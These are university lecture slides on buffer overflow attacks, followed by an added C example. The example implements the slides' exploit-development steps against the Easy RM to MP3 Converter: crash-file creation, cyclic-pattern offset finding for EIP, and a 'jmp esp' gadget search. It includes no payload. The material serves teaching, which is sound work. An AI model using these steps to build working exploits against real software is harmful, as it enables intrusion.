Software Security
Dept. of Computer Science, Nanjing University

Outline (83 slides):
  Buffer Overflow: The Essentials
    Vulnerability Metrics
    What are Buffer Overflows?
    Basic Example
  Shellcode
    Definition
    Basic Example
    Shell-Spawning Shellcode
  A Real World Buffer Overflow Attack
    Key Point
    A vulnerability in Easy RM to MP3 Conversion
    How to hack the vulnerable program
  Integer Overflow
    Overview
    A Real World Example
    Common Patterns in Integer Overflow
  Heap Overflow
    What is the Heap?
    An Abstract Example

Slide 25 / 83 - A Real World Buffer Overflow Attack: Key Point

Key points to implement our attack:
  1. Determine the buffer size needed to write exactly into EIP.
  2. Find memory space to host the shellcode.
  3. Jump to the shellcode in a reliable way.
  4. Get the shellcode in place and finalize the exploit.
Slide 26 / 83 - Real Attack: A vulnerability in Easy RM to MP3 Conversion

A vulnerability in Easy RM to MP3 Conversion Utility: verify the bug
  - The vulnerability report states: "Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit that creates a malicious .m3u file".
  - In other words, you can create a malicious .m3u file, feed it into the utility and trigger the exploit.
[Screenshot: the Easy RM to MP3 Converter main window, with its Purchase, Load, Batch and Start buttons]
Slide 27 / 83 - Real Attack: A vulnerability in Easy RM to MP3 Conversion

A vulnerability in Easy RM to MP3 Conversion Utility: verify the bug
  - Load crash.m3u (contains 10000 'A's) into the application.
  - Result: failure in loading the file! Not a crash!!!
[Screenshot: Easy RM to MP3 Converter dialog reporting the failure to load crash.m3u]
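The steps on slides 25 to 27 in working code: writing the crash.m3u of 'A' bytes used to verify the bug, replacing those bytes with a cyclic pattern so that the value found in EIP after a crash gives the exact offset (key point 1), and scanning a module image for a "jmp esp" opcode to reach the shellcode reliably (key point 3). This is an added example written for this page; it is not code from the slides or from the original Easy RM to MP3 exploit. The file names crash.m3u and pattern.m3u, the Metasploit-style upper/lower/digit pattern, and the sample module bytes are assumptions made for the example.

```c
/* Added example for this page (not code from the slides or from the original
 * Easy RM to MP3 exploit). Helpers for the steps listed on the slides:
 *   verify: write crash.m3u made of N 'A' bytes (the slide used N = 10000,
 *           which the converter refused to load instead of crashing);
 *   step 1: write the same length as a cyclic pattern, so the 4 bytes that
 *           land in EIP at the crash give the exact offset;
 *   step 3: locate a "jmp esp" (FF E4) in a module image to jump to the
 *           shellcode reliably.
 * Assumptions: the file names, the Metasploit-style pattern and the sample
 * module bytes below are all made up for this example. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define PATTERN_MAX (26 * 26 * 10 * 3)   /* 20280 bytes with distinct 4-byte windows */

/* Byte i of the cyclic pattern "Aa0Aa1Aa2...Aa9Ab0...Zz9": triplets of
 * (upper, lower, digit) with the digit changing fastest. */
int pattern_byte(size_t i)
{
    size_t t = i / 3;                                /* which triplet */
    switch (i % 3) {
    case 0:  return 'A' + (int)(t / 260);            /* 26*10 triplets per upper letter */
    case 1:  return 'a' + (int)((t / 10) % 26);
    default: return '0' + (int)(t % 10);
    }
}

size_t make_pattern(char *out, size_t len)
{
    if (len > PATTERN_MAX) len = PATTERN_MAX;
    for (size_t i = 0; i < len; i++) out[i] = (char)pattern_byte(i);
    return len;
}

/* Offset in the pattern of the 4 bytes that overwrote EIP, given the value
 * the debugger shows in EIP. x86 is little-endian, so EIP = 0x41306141 means
 * the bytes 41 61 30 41 ("Aa0A") sat at the overwriting position. */
long pattern_offset(uint32_t eip)
{
    char pat[PATTERN_MAX];
    size_t n = make_pattern(pat, PATTERN_MAX);
    unsigned char needle[4] = {
        (unsigned char)(eip), (unsigned char)(eip >> 8),
        (unsigned char)(eip >> 16), (unsigned char)(eip >> 24)
    };
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;   /* not pattern bytes, e.g. 0x41414141 from a file of plain 'A's */
}

/* Offset of the first "jmp esp" (FF E4) in a module image, or -1. The usable
 * address is module base + offset; it must come from a module that is not
 * rebased/ASLR'd, and it must not contain bytes the .m3u parser treats as
 * terminators (0x00, 0x0a, 0x0d). */
long find_jmp_esp(const unsigned char *mod, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (mod[i] == 0xFF && mod[i + 1] == 0xE4) return (long)i;
    return -1;
}

/* Write an .m3u whose single line is `len` bytes: the given buffer, or 'A's
 * when fill is NULL. Returns 0 on success. */
int write_m3u(const char *path, const char *fill, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    for (size_t i = 0; i < len; i++)
        fputc(fill ? fill[i] : 'A', f);
    return fclose(f) == 0 ? 0 : -1;
}

int main(void)
{
    size_t len = 10000;                    /* the slide's length; raise it until the converter crashes */
    write_m3u("crash.m3u", NULL, len);     /* verify-the-bug file: 10000 'A's */

    char pat[PATTERN_MAX];
    size_t n = make_pattern(pat, len);     /* step 1: same length, but every 4-byte window is unique */
    write_m3u("pattern.m3u", pat, n);

    /* Suppose the debugger reported EIP = 0x68423368 after loading pattern.m3u */
    printf("EIP overwritten by pattern bytes at offset %ld\n", pattern_offset(0x68423368u));

    /* Step 3: constructed module bytes (push ebp; mov ebp,esp; nop; jmp esp; ret) */
    const unsigned char mod[] = { 0x55, 0x8B, 0xEC, 0x90, 0xFF, 0xE4, 0xC3 };
    printf("jmp esp at module offset %ld\n", find_jmp_esp(mod, sizeof mod));
    return 0;
}
```

Feed pattern_offset the EIP value exactly as the debugger prints it; the byte reversal for little-endian is done inside. A result of -1 means EIP was not overwritten by pattern bytes, which is what a file of plain 'A's (EIP = 0x41414141) or a file that is rejected before parsing, as on slide 27, would give.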